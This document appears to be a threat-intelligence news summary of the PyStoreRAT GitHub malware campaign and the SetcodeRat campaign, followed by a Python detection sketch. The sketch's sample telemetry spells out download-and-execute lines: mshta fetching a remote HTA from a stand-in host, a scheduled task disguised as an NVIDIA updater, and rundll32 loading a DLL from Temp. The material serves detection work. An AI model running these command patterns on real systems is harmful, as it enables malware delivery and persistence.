GitHub OSINT Repos Push PyStoreRAT, a Modular JS RAT

December 13, 2025 at 12:00 AM

Threat actors are seeding GitHub with fake OSINT, GPT wrappers, DeFi bots, and security utilities to deliver PyStoreRAT, a previously undocumented modular JavaScript RAT. The loaders are tiny Python or JavaScript stubs that silently fetch a remote HTA and run it via mshta.exe.

Morphisec researcher Yonatan Edri reports the campaign began in mid-June 2025, with continual repo drops promoted on YouTube and X. Stars and forks were artificially inflated, echoing the Stargazers Ghost Network. Operators used new or dormant GitHub accounts and slipped the malicious code in so-called maintenance commits during October–November once projects trended. Many tools barely worked, serving only to legitimize the download-and-execute stub.

How the infection flows:

  • Loader enumerates installed AV and searches for Falcon and Reason indicators to reduce visibility.
  • If one of those AV products is detected, mshta.exe is launched through cmd.exe; otherwise it is invoked directly.
  • A remote HTA retrieves and launches PyStoreRAT and establishes persistence using a scheduled task disguised as an NVIDIA self-update.
  • The malware then contacts its server for follow-on commands.

What PyStoreRAT can do:

  • Execute EXE payloads, including the Rhadamanthys info stealer
  • Download and extract ZIP archives
  • Fetch a malicious DLL and run it with rundll32.exe
  • Pull raw JavaScript and execute it in memory via eval
  • Install MSI packages
  • Spawn secondary mshta.exe to load more HTA payloads
  • Run PowerShell commands in memory
  • Spread via removable drives by swapping documents with LNK shortcuts
  • Delete its scheduled task to hinder forensics

Additional behaviors and targets:

  • System profiling and admin privilege checks
  • Scans for crypto wallet data linked to Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02
  • Russian-language artifacts suggest an Eastern European actor

Bigger picture: a parallel campaign in China

  • QiAnXin details SetcodeRat, spread via malvertising since October 2025 and disguised as popular installers like Google Chrome
  • Installer verifies the victim is in a Chinese-speaking region (Zh-CN, Zh-HK, Zh-MO, Zh-TW) and checks a Bilibili URL; otherwise it exits
  • Uses pnm2png.exe to sideload zlib1.dll, which decrypts qt.conf to run an embedded RAT DLL
  • Communicates via Telegram or a conventional C2 and supports screenshots, keylogging, file and folder operations, process execution, cmd.exe, socket setup, system and network info collection, and self-update
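The behaviours listed above (a script stub handing a remote HTA to mshta.exe, a scheduled task dressed up as an NVIDIA updater, mshta.exe spawning rundll32/PowerShell/msiexec, and pnm2png.exe sideloading zlib1.dll) are all visible in ordinary process-creation and image-load telemetry. The following is an added detection sketch, not code from Morphisec, QiAnXin or the article: it runs four rules over Sysmon-style events. The event layout, the task name "NVIDIA SelfUpdate", the example.invalid URLs and the file paths are constructed for the sample; the article gives no exact task name, URL or path, so the rules match on the described pattern rather than on specific indicators.

```python
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 style). loaded_dlls carries any
    image-load records (Sysmon event 7) for the same process, used by the sideload rule.
    Constructed layout for this example, not a real log schema."""
    image: str
    cmdline: str
    parent_image: str
    loaded_dlls: list = field(default_factory=list)


# Interpreters the article names as loaders (Python/JS stubs) plus cmd.exe, which the
# loader uses as an intermediary when it spots AV.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "node.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Processes that create the persistence task in the described chain.
SECOND_STAGE_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Directories a standard user can write to; a sideloaded DLL normally lives here.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\appdata\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_remote_hta(e: ProcEvent) -> bool:
    """mshta.exe started by a script interpreter or cmd.exe with a URL on the command line."""
    return (basename(e.image) == "mshta.exe"
            and basename(e.parent_image) in SCRIPT_HOSTS
            and "http" in e.cmdline.lower())


def rule_disguised_task(e: ProcEvent) -> bool:
    """schtasks /create from a script host, vendor-sounding name, action that runs a script."""
    cl = e.cmdline.lower()
    return (basename(e.image) == "schtasks.exe"
            and "/create" in cl
            and basename(e.parent_image) in SECOND_STAGE_HOSTS
            and "nvidia" in cl
            and any(h in cl for h in ("mshta", "wscript", "powershell", ".js", ".hta")))


def rule_mshta_child(e: ProcEvent) -> bool:
    """mshta.exe spawning the follow-on module loaders the RAT is described as using."""
    return (basename(e.parent_image) == "mshta.exe"
            and basename(e.image) in {"rundll32.exe", "powershell.exe", "mshta.exe", "msiexec.exe"})


def rule_sideload(e: ProcEvent) -> bool:
    """pnm2png.exe loading zlib1.dll from a user-writable directory (heuristic for the
    SetcodeRat installer; a legitimate pnm2png install under Program Files will not match)."""
    if basename(e.image) != "pnm2png.exe":
        return False
    return any(basename(d) == "zlib1.dll" and any(m in d.lower() for m in USER_WRITABLE)
               for d in e.loaded_dlls)


RULES = {
    "remote_hta": rule_remote_hta,
    "disguised_task": rule_disguised_task,
    "mshta_child": rule_mshta_child,
    "sideload": rule_sideload,
}


def scan(events):
    """Return (rule_name, process_name) for every event that trips a rule."""
    return [(name, basename(e.image))
            for e in events
            for name, rule in RULES.items() if rule(e)]


# Constructed sample telemetry: four events modelled on the described chain, then two
# benign look-alikes that should stay quiet.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "http://example.invalid/update.hta"',
              r"C:\Users\u\AppData\Local\Programs\Python\python.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc minute /tn "NVIDIA SelfUpdate" /tr "mshta http://example.invalid/u.hta"',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\u\AppData\Local\Temp\m.dll,Run",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Users\u\Downloads\ChromeSetup\pnm2png.exe", "pnm2png.exe",
              r"C:\Users\u\Downloads\ChromeSetup.exe",
              [r"C:\Users\u\Downloads\ChromeSetup\zlib1.dll", r"C:\Windows\System32\kernel32.dll"]),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Program Files\Vendor\help.hta",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "Backup" /tr "C:\Tools\backup.exe"',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for name, proc in scan(SAMPLE_EVENTS):
        print(f"{name:15} {proc}")
```

Each rule keys on a parent/child relationship or an argument pattern rather than on a hash or domain, so it survives the operators rotating repositories and HTA hosts; the cost is that the task-name and sideload rules are heuristics and should be tuned against the environment's baseline before alerting on them.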

Why it matters: PyStoreRAT exemplifies a shift to modular, script-first implants that abuse trusted platforms, adapt to controls, and evade EDR until late in the chain.

Source: The Hacker News
